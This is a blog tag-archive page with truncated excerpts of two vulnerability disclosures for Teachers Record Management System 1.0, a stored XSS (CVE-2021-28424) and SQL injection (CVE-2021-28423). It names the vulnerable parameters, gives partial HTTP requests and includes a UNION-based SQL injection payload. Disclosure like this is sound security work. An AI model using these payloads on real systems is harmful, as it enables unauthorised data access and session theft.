# Exploit Author: nhattruong.blog# Referrer: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28424https://www.exploit-db.com/exploits/50019https://packetstormsecurity.com/files/163171/Teachers-Record-Management-System-1.0-Cross-Site-Scripting.html# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4POC: Go to url http://localhost/admin/index.phpDo loginExecute the payloadReload page to see the different The entry point in ’email’ POST parameter in admin/adminprofile.php Payload: POST /admin/adminprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3ContinueContinue reading “[CVE-2021-28424] Teachers Record Management System 1.0 – ‘email’ Stored Cross-site Scripting (XSS) vulnerability (Authenticated)”
Tag Archives: Teachers Record Management System 1.0
[CVE-2021-28423] Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
# Exploit Author: nhattruong.bloghttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28423https://www.exploit-db.com/exploits/50018https://packetstormsecurity.com/files/163172/Teachers-Record-Management-System-1.0-SQL-Injection.html# Version: 1.0# Tested on: Windows 10 + XAMPP v3.2.4 POC: Go to url http://localhost/admin/index.phpDo loginExecute the payload SQLi #1: The entry point in ‘editid’ GET parameter in edit-subjects-detail.php http://local/admin/edit-subjects-detail.php?editid=-1 union select 1,user(),3– – SQLi #2: The entry point in ‘searchdata’ POST parameter in /admin/search.php POST /admin/search.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (WindowsContinueContinue reading “[CVE-2021-28423] Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)”
Nhat Truong Blog 